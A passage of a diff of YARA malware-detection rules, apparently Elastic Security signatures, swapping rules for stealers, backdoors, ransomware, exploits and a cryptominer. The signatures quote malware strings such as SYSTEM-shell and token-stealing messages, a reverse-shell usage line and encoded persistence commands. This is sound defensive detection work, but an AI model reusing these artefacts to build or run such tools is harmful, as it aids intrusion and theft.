ELASTIC_Windows_Trojan_Fickerstealer_Cc02E75E : FILE MEMORY { meta: - description = "Identifies RAGNAROK ransomware" + description = "Detects Windows Trojan Fickerstealer (Windows.Trojan.Fickerstealer)" author = "Elastic Security" - id = "5625d3f6-7071-4a09-8ddf-faa2d081b539" - date = "2020-05-03" + id = "cc02e75e-2049-4ee4-9302-e491e7dad696" + date = "2021-07-22" modified = "2021-08-23" - reference = "https://twitter.com/malwrhunterteam/status/1256263426441125888?s=20" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Ragnarok.yar#L73-L95" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "8c22cf9dfbeba7391f6d2370c88129650ef4c778464e676752de1d0fd9c5b34e" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Fickerstealer.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a4113ccb55e06e783b6cb213647614f039aa7dbb454baa338459ccf37897ebd6" + logic_hash = "ccfd7edf7625c13eea5b88fa29f9b8d3d873688f328f3e52c0500ac722c84511" score = 75 - quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "5c0a4e2683991929ff6307855bf895e3f13a61bbcc6b3c4b47d895f818d25343" - threat_name = "Windows.Ransomware.Ragnarok" - severity = 100 + quality = 73 + tags = "FILE, MEMORY" + fingerprint = "022088764645d85dd20d1ce201395b4e79e3e716723715687eaecfcbe667615e" + severity = 80 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $b1 = "prv_ip" ascii fullword - $b2 = "%i.%i.%i" ascii fullword - $b3 = "pub_ip" ascii fullword - $b4 = "cometosee" ascii fullword + $a1 = "..\\\\?\\.\\UNC\\Windows stdio in console mode does not support writing non-UTF-8 byte sequences" ascii fullword + $a2 = "\"SomeNone" ascii fullword condition: - all of ($b*) + all of them } -rule ELASTIC_Windows_Exploit_Generic_E95Cc41C : FILE +rule ELASTIC_Windows_Trojan_Fickerstealer_F2159Bec : FILE MEMORY { meta: - description = "Detects Windows Exploit Generic (Windows.Exploit.Generic)" + description = "Detects Windows Trojan Fickerstealer (Windows.Trojan.Fickerstealer)" author = "Elastic Security" - id = "e95cc41c-6cad-4b9c-b647-3c60e6614e25" - date = "2024-02-28" - modified = "2024-06-12" + id = "f2159bec-a3ce-47a9-91ad-43b8a19ac172" + date = "2021-07-22" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Exploit_Generic.yar#L1-L32" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4cce9e39c376f67c16df3bcd69efd9b7472c3b478e2e5ef347e1410f1105c38d" - logic_hash = "9b620988a6ee84ed0cbb0fb0a3cca633fffc8e6369ed45455e9e1e6c021ea461" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Fickerstealer.yar#L22-L40" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a4113ccb55e06e783b6cb213647614f039aa7dbb454baa338459ccf37897ebd6" + logic_hash = "d36cb90b526a291858291d615272baa78881309c83376f4d4cce1768c740ddbc" score = 75 quality = 75 - tags = "FILE" - fingerprint = "78f78de7cee54107ee7c3de9b152ce3a242c1408115ab0950ccdfc278ed15a19" + tags = "FILE, MEMORY" + fingerprint = "0671691c6d5c7177fe155e4076ab39bf5f909ed300f32c1530e80d471dff0296" severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $s1 = "Got system privileges" nocase - $s2 = "Got SYSTEM token" nocase - $s3 = "Got a SYSTEM token" nocase - $s4 = "] Duplicating SYSTEM token" nocase - $s5 = "] Token Stealing is successful" nocase - $s6 = "] Exploit completed" nocase - $s7 = "] Got SYSTEM shell." nocase - $s8 = "] Spawning SYSTEM shell" nocase - $s9 = "we have a SYSTEM shell!" nocase - $s10 = "Dropping to System Shell." nocase - $s11 = "] Enjoy the NT AUTHORITY\\SYSTEM shell" nocase - $s12 = "] SMEP is disabled" nocase - $s13 = "] KUSER_SHARED_DATA" - $s14 = "] Found System EPROCESS" + $a1 = { 10 12 F2 0F 10 5A 08 31 C1 89 C6 8B 42 50 89 7D F0 F2 0F 11 8D 18 FF } condition: - any of them + all of them } -rule ELASTIC_Windows_Exploit_Generic_008359Cf : FILE +rule ELASTIC_Linux_Backdoor_Tinyshell_67Ee6Fae : FILE MEMORY { meta: - description = "Detects Windows Exploit Generic (Windows.Exploit.Generic)" + description = "Detects Linux Backdoor Tinyshell (Linux.Backdoor.Tinyshell)" author = "Elastic Security" - id = "008359cf-5510-4f91-8cb1-7b4ff645bf2d" - date = "2024-02-28" - modified = "2024-06-12" + id = "67ee6fae-304b-47f5-93b6-4086a864d433" + date = "2021-10-12" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Exploit_Generic.yar#L34-L57" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "73225a3a54560965f4c4fae73f7ee234e31217bc06ff8ba1d0b36ebab5e76a87" - logic_hash = "9514241b5573c8d01ccd012195e29aefc3ef8a12eb982e6dd9ec66b00c064bd8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Backdoor_Tinyshell.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9d2e25ec0208a55fba97ac70b23d3d3753e9b906b4546d1b14d8c92f8d8eb03d" + logic_hash = "200d4267e21b8934deecc48273294f2e34464fcb412e39f3f5a006278631b9f1" score = 75 quality = 75 - tags = "FILE" - fingerprint = "3ef3b6bbe2141cb8ce47a5ee7c7531e72773d4dc4e478bb792c9230e4948db02" + tags = "FILE, MEMORY" + fingerprint = "f71ce364fb607ee6f4422864674ae3d053453b488c139679aa485466893c563d" severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { C6 85 ?? 01 00 00 74 C6 85 ?? 01 00 00 58 C6 85 ?? 01 00 00 58 } - $a2 = { C6 45 ?? 41 C6 45 ?? 66 C6 45 ?? 64 C6 45 ?? 4F C6 45 ?? 70 C6 45 ?? 65 C6 45 ?? 6E C6 45 ?? 50 C6 45 ?? 61 C6 45 ?? 63 C6 45 ?? 6B C6 45 ?? 65 C6 45 ?? 74 C6 45 ?? 58 C6 45 ?? 58 } - $b1 = "NtCreateFile" - $b2 = "\\Device\\Afd\\Endpoint" wide nocase - $b3 = "\\Device\\Afd\\Endpoint" nocase - $b4 = "NtDeviceIoControlFile" + $a1 = "Usage: %s [ -c [ connect_back_host ] ] [ -s secret ] [ -p port ]" fullword + $a2 = "s:p:c::" fullword + $b1 = "Usage: %s [ -s secret ] [ -p port ] [command]" fullword + $b2 = " get " fullword condition: - 1 of ($a*) and 3 of ($b*) + ( all of ($a*)) or ( all of ($b*)) } -rule ELASTIC_Windows_Exploit_Generic_8C54846D : FILE +rule ELASTIC_Windows_Trojan_Arkeistealer_84C7086A : FILE MEMORY { meta: - description = "Detects Windows Exploit Generic (Windows.Exploit.Generic)" + description = "Detects Windows Trojan Arkeistealer (Windows.Trojan.ArkeiStealer)" author = "Elastic Security" - id = "8c54846d-07ee-43bc-93e1-72bf4162ab87" - date = "2024-02-29" - modified = "2024-06-12" + id = "84c7086a-abc3-4b97-b325-46a078b90a95" + date = "2022-02-17" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Exploit_Generic.yar#L59-L87" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b6ea4815a38e606d4a2d6e6d711e610afec084db6899b7d6fc874491dd939495" - logic_hash = "0662c8edb449e15b16be3e53a88cf62af46b4a656c1a49b399e131c2ad71b55a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_ArkeiStealer.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2" + logic_hash = "b7129094389f789f0b43f0da54645c24a6d1149f53d6536c14714e3ff44f935b" score = 75 - quality = 71 - tags = "FILE" - fingerprint = "9acb35c06a21e35639c8026a18e919329db82a0629a8e2267f1f4fe00b3bb871" + quality = 75 + tags = "FILE, MEMORY" + fingerprint = "f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d" severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 5C 63 76 65 2D 32 30 ?? ?? 2D ?? ?? ?? ?? 5C 78 36 34 5C 52 65 6C 65 61 73 65 5C } - $a2 = { 5C 43 56 45 2D 32 30 ?? ?? 2D ?? ?? ?? ?? 5C 78 36 34 5C 52 65 6C 65 61 73 65 5C } - $a3 = { 5C 78 36 34 5C 52 65 6C 65 61 73 65 5C 43 56 45 2D 32 30 ?? ?? 2D ?? ?? ?? ?? ?? 2E 70 64 62 } - $a4 = { 5C 52 65 6C 65 61 73 65 5C 43 56 45 2D 32 30 ?? ?? 2D } - $a5 = "\\x64\\Release\\CmdTest.pdb" - $a6 = "\\x64\\Release\\RunPS.pdb" - $a7 = "X:\\tools\\0day\\" - $a8 = "C:\\work\\volodimir_" - $a9 = { 78 36 34 5C 52 65 6C 65 61 73 65 5C 65 78 70 6C 6F 69 74 2E 70 64 62 } - $b1 = { 5C 43 56 45 2D 32 30 ?? ?? 2D } - $b2 = { 5C 78 36 34 5C 52 65 6C 65 61 73 65 5C } + $a = { 01 89 55 F4 8B 45 F4 3B 45 10 73 31 8B 4D 08 03 4D F4 0F BE 19 8B } condition: - any of ($a*) or all of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Dcrat_1Aeea1Ac : FILE MEMORY +rule ELASTIC_Linux_Ransomware_Gonnacry_53C3832D : FILE MEMORY { meta: - description = "Detects Windows Trojan Dcrat (Windows.Trojan.DCRat)" + description = "Detects Linux Ransomware Gonnacry (Linux.Ransomware.Gonnacry)" author = "Elastic Security" - id = "1aeea1ac-69b9-4cc6-91af-18b7a79f35ce" - date = "2022-01-15" - modified = "2022-04-12" + id = "53c3832d-ceff-407d-920b-7b6442688fa9" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_DCRat.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "6163e04a40ed52d5e94662131511c3ae08d473719c364e0f7de60dff7fa92cf7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_Gonnacry.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f5de75a6db591fe6bb6b656aa1dcfc8f7fe0686869c34192bfa4ec092554a4ac" + logic_hash = "2b7453c4eb71b71e6a241f728b077a2ee63d988d55a64fedf61c34222799e262" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9" + fingerprint = "7d93c26c9e069af5cef964f5747104ba6d1d0d030a1f6b1c377355223c5359a1" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "havecamera" ascii fullword - $a2 = "timeout 3 > NUL" wide fullword - $a3 = "START \"\" \"" wide fullword - $a4 = "L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g" wide fullword - $a5 = "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==" wide fullword - $b1 = "DcRatByqwqdanchun" ascii fullword - $b2 = "DcRat By qwqdanchun1" ascii fullword + $a = { 55 48 89 E5 48 83 EC 10 48 89 7D F8 EB 56 48 8B 45 F8 48 8B } condition: - 5 of ($a*) or 1 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Buerloader_C8A60F46 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Phobos_A5420148 : BETA FILE MEMORY { meta: - description = "Detects Windows Trojan Buerloader (Windows.Trojan.Buerloader)" + description = "Identifies Phobos ransomware" author = "Elastic Security" - id = "c8a60f46-d49a-4566-845b-675fb55c201c" - date = "2021-08-16" - modified = "2021-10-04" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Buerloader.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3abed86f46c8be754239f8c878f035efaae91c33b8eb8818c5bbed98c4d9a3ac" - logic_hash = "d11b117efc10547e77ce8979f8a1d42f34937101e58a0e36228baa37cd30d2aa" + id = "a5420148-2f80-4a14-8a0d-98943fcbe784" + date = "2020-06-25" + modified = "2021-08-23" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Phobos.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "9fcfe41102bee4f8ecf19f30d0bbb2de50e1a1aff4e17c587b5d9adb417527c5" score = 75 - quality = 73 - tags = "FILE, MEMORY" - fingerprint = "346233f4b1306eb574b4063d3b47f90e65a81ad7fe1c74d2a68640d99d456c4c" + quality = 75 + tags = "BETA, FILE, MEMORY" + fingerprint = "2b3937dbecb9a12e5e276c681eb40cb3884411a048175fcfe1bd4be3f7611aca" + threat_name = "Windows.Ransomware.Phobos" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -66351,62 +67193,59 @@ rule ELASTIC_Windows_Trojan_Buerloader_C8A60F46 : FILE MEMORY os = "windows" strings: - $a1 = "User-Agent: Host: HTTP/1.1" ascii fullword - $a2 = "ServerHelloPayloadrandom" ascii fullword - $a3 = "Bad JSON in payload" ascii fullword - $a4 = { 7B 22 68 65 6C 6C 6F 22 3A 20 22 77 6F 72 6C 64 22 7D 48 54 54 50 2F 31 2E 31 20 33 30 31 20 46 6F 75 6E 64 } - $a5 = "PayloadU24UnknownExtensiontyp" ascii fullword - $a6 = " NTDLL.DLL" wide fullword + $a1 = { 61 00 63 00 75 00 74 00 65 00 00 00 61 00 63 00 74 00 69 00 6E 00 00 00 61 00 63 00 74 00 6F 00 6E 00 00 00 61 00 63 00 74 00 6F 00 72 00 00 00 61 00 63 00 75 00 66 00 66 00 00 } + $a2 = { 0C 6D 00 73 00 66 00 74 00 65 00 73 00 71 00 6C 00 2E 00 65 00 78 00 65 00 00 00 73 00 71 00 6C 00 61 00 67 00 65 00 6E 00 74 00 2E 00 65 00 78 00 65 00 00 00 73 00 71 00 6C 00 62 00 72 00 6F 00 77 00 73 00 65 00 72 00 2E 00 65 00 78 00 65 00 00 00 73 00 71 00 6C 00 73 00 65 00 72 00 76 00 72 00 2E 00 65 00 78 00 65 00 00 00 73 00 71 00 6C 00 77 00 72 00 69 00 74 00 65 00 72 00 2E 00 65 00 78 00 65 00 00 00 6F 00 72 00 61 00 63 00 6C 00 65 00 2E 00 65 00 78 00 } + $a3 = { 31 00 63 00 64 00 00 00 33 00 64 00 73 00 00 00 33 00 66 00 72 00 00 00 33 00 67 00 32 00 00 00 33 00 67 00 70 00 00 00 37 00 7A 00 00 00 61 00 63 00 63 00 64 00 61 00 00 00 61 00 63 00 63 00 64 00 62 00 00 00 61 00 63 00 63 00 64 00 63 00 00 00 61 00 63 00 63 00 64 00 65 00 00 00 61 00 63 00 63 00 64 00 74 00 00 00 61 00 63 00 63 00 64 00 77 00 00 00 61 00 64 00 62 00 00 00 61 00 64 00 70 00 00 00 61 00 69 00 00 00 61 00 69 00 33 00 00 00 61 00 69 00 34 00 00 00 61 00 69 00 35 00 00 00 61 00 69 00 36 00 00 00 61 00 69 00 37 00 00 00 61 00 69 00 38 00 00 00 61 00 6E 00 69 00 6D 00 00 00 61 00 72 00 77 00 00 00 61 00 73 00 00 00 61 00 73 00 61 00 00 00 61 00 73 00 63 00 00 00 61 00 73 00 63 00 78 00 00 00 61 00 73 00 6D 00 00 00 61 00 73 00 6D 00 78 00 00 00 61 00 73 00 70 00 00 00 61 00 73 00 70 00 78 00 00 00 61 00 73 00 72 00 00 00 61 00 73 00 78 00 00 00 61 00 76 00 69 00 00 00 61 00 76 00 73 00 00 00 62 00 61 00 63 00 6B 00 75 00 70 00 00 00 62 00 61 00 6B 00 00 00 62 00 61 00 79 00 00 00 62 00 64 00 00 00 62 00 69 00 6E 00 00 00 62 00 6D 00 70 00 00 00 } condition: - all of them + 2 of ($a*) } -rule ELASTIC_Windows_Trojan_Microbackdoor_903E33C3 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Phobos_Ff55774D : BETA FILE MEMORY { meta: - description = "Detects Windows Trojan Microbackdoor (Windows.Trojan.MicroBackdoor)" + description = "Identifies Phobos ransomware" author = "Elastic Security" - id = "903e33c3-d8f1-4c3b-900b-7503edb11951" - date = "2022-03-07" - modified = "2022-04-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_MicroBackdoor.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fbbfcc81a976b57739ef13c1545ea4409a1c69720469c05ba249a42d532f9c21" - logic_hash = "5f96f68df442eb1da21d87c3ae954c4e36cf87db583cbef1775f8ca9e76b776e" + id = "ff55774d-4425-4243-8156-ce029c1d5860" + date = "2020-06-25" + modified = "2021-08-23" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Phobos.yar#L24-L43" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "9ee41b9638a8cc1d9f9b254878c935c531b2f599be59550b3617b1de8cba2ba5" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "06b3c0164c2d06f50d1e6ae0a9edf823ae1fef53574e0d20020aada8721dfee0" - severity = 100 + tags = "BETA, FILE, MEMORY" + fingerprint = "d8016c9be4a8e5b5ac32b7108542fee8426d65b4d37e2a9c5ad57284abb3781e" + threat_name = "Windows.Ransomware.Phobos" + severity = 90 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { 55 8B EC 83 EC 1C 56 57 E8 33 01 00 00 8B F8 85 FF 74 48 BA 26 80 AC C8 8B CF E8 E1 01 00 00 BA } + $c1 = { 24 18 83 C4 0C 8B 4F 0C 03 C6 50 8D 54 24 18 52 51 6A 00 6A 00 89 44 } condition: - all of them + 1 of ($c*) } -rule ELASTIC_Windows_Trojan_Microbackdoor_46F2E5Fd : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Phobos_11Ea7Be5 : BETA FILE MEMORY { meta: - description = "Detects Windows Trojan Microbackdoor (Windows.Trojan.MicroBackdoor)" + description = "Identifies Phobos ransomware" author = "Elastic Security" - id = "46f2e5fd-edea-4321-b38c-7478b47f054b" - date = "2022-03-07" - modified = "2022-04-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_MicroBackdoor.yar#L21-L44" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fbbfcc81a976b57739ef13c1545ea4409a1c69720469c05ba249a42d532f9c21" - logic_hash = "580be4c5b058916c2bc67a7964522a7c369bb254394e3cedbf0da025105231c4" + id = "11ea7be5-7aac-41d7-8d09-45131a9c656e" + date = "2020-06-25" + modified = "2021-08-23" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Phobos.yar#L45-L64" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "1f86695f316200c92d0d02f5f3ba9f68854978f98db5d4291a81c06c9f0b8d28" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "d4e410b9c36c1d5206f5d17190ef4e5fd4b4e4d40acad703775aed085a08ef7c" + tags = "BETA, FILE, MEMORY" + fingerprint = "a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697" + threat_name = "Windows.Ransomware.Phobos" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -66414,33 +67253,29 @@ rule ELASTIC_Windows_Trojan_Microbackdoor_46F2E5Fd : FILE MEMORY os = "windows" strings: - $a1 = "cmd.exe /C \"%s%s\"" wide fullword - $a2 = "%s|%s|%d|%s|%d|%d" wide fullword - $a3 = "{{{$%.8x}}}" ascii fullword - $a4 = "30D78F9B-C56E-472C-8A29-E9F27FD8C985" ascii fullword - $a5 = "chcp 65001 > NUL & " wide fullword - $a6 = "CONNECT %s:%d HTTP/1.0" ascii fullword + $b1 = { C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89 } condition: - 5 of them + 1 of ($b*) } -rule ELASTIC_Windows_Hacktool_Cpulocker_73B41444 : FILE +rule ELASTIC_Windows_Vulndriver_ATSZIO_E22Cc429 : FILE { meta: - description = "Detects Windows Hacktool Cpulocker (Windows.Hacktool.CpuLocker)" + description = "Name: ATSZIO.sys" author = "Elastic Security" - id = "73b41444-4c17-4fea-b440-fe7b0a086a7f" - date = "2022-04-04" - modified = "2022-04-04" + id = "e22cc429-0285-4ab1-ae35-7e905e467182" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_CpuLocker.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dbfc90fa2c5dc57899cc75ccb9dc7b102cb4556509cdfecde75b36f602d7da66" - logic_hash = "8fb33744326781c51bb6bd18d0574602256b813b62ec8344d5338e6442bb2de0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_ATSZIO.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece" + logic_hash = "e3f057d5a5c47a1f3b4d50e2ad0ebb3a4ffe0efe513a0d375f827fadb3328d80" score = 75 quality = 75 tags = "FILE" - fingerprint = "3f90517fbeafdccd37e4b8ab0316a91dd18a911cb1f4ffcd4686ab912a0feab4" + fingerprint = "21cf1d00acde85bdae8c4cf6d59b0d224458de30a32dbddebd99eab48e1126bb" + threat_name = "Windows.VulnDriver.ATSZIO" severity = 50 arch_context = "x86" scan_context = "file" @@ -66448,129 +67283,115 @@ rule ELASTIC_Windows_Hacktool_Cpulocker_73B41444 : FILE os = "windows" strings: - $str1 = "\\CPULocker.pdb" + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 41 00 54 00 53 00 5A 00 49 00 4F 00 2E 00 73 00 79 00 73 00 00 00 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name } -rule ELASTIC_Windows_Trojan_Hotpage_414F235F : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Loudminer_581F57A9 : FILE MEMORY { meta: - description = "Detects Windows Trojan Hotpage (Windows.Trojan.HotPage)" + description = "Detects Linux Cryptominer Loudminer (Linux.Cryptominer.Loudminer)" author = "Elastic Security" - id = "414f235f-5e16-449a-9ac5-556655c4418e" - date = "2024-07-18" - modified = "2024-07-26" + id = "581f57a9-36e0-4b95-9a1e-837bdd4aceab" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_HotPage.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b8464126b64c809b4ab47aa91c5f322ce2c0ae4fd668a43de738a5caa7567225" - logic_hash = "cfa0036b22a83a5396b3f9014511720071246a775053ad493791ebc1212400f2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Loudminer.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2c2729395805fc9d3c1e654c9a065bbafc4f28d8ab235afaae8d2c484060596b" + logic_hash = "82db0985f215da1d84e16fce94df7553b43b06082bf5475515dbbcf016c40fe4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6f590056d3f7bb9f743861e8d317ec589d8703353428dfcea9a6d2f61f266cdf" + fingerprint = "1013e6e11ea2a30ecf9226ea2618a59fb08588cdc893053430e969fbdf6eb675" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $SpcSpOpusInfo = { 30 48 A0 1A 80 18 6E 56 53 17 76 FE 7F 51 7F 51 7E DC 79 D1 62 80 67 09 96 50 51 6C 53 F8 } - $s1 = "\\Device\\KNewTableBaseIo" - $s2 = "Release\\DwAdsafeLoad.pdb" - $s3 = "RedDriver.pdb" - $s4 = "Release\\DwAdSafe.pdb" - $s5 = "[%s] Begin injecting Broser pid=[%d]" - $s6 = "[%s] ADDbrowser PID ->[%d]" + $a = { 44 24 08 48 8B 70 20 48 8B 3B 48 83 C3 08 48 89 EA 48 8B 07 FF } condition: - $SpcSpOpusInfo or 2 of ($s*) + all of them } -rule ELASTIC_Macos_Hacktool_Bifrost_39Bcbdf8 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Loudminer_F2298A50 : FILE MEMORY { meta: - description = "Detects Macos Hacktool Bifrost (MacOS.Hacktool.Bifrost)" + description = "Detects Linux Cryptominer Loudminer (Linux.Cryptominer.Loudminer)" author = "Elastic Security" - id = "39bcbdf8-86dc-480e-8822-dc9832bb9b55" - date = "2021-10-12" - modified = "2021-10-25" + id = "f2298a50-7bd4-43d8-ac84-b36489405f2e" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Hacktool_Bifrost.yar#L1-L27" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e2b64df0add316240b010db7d34d83fc9ac7001233259193e5a72b6e04aece46" - logic_hash = "a2ff4f1aca51e80f2b277e9171e99a80a75177d1d17d487de2eb8872832cb0d5" + source_url = 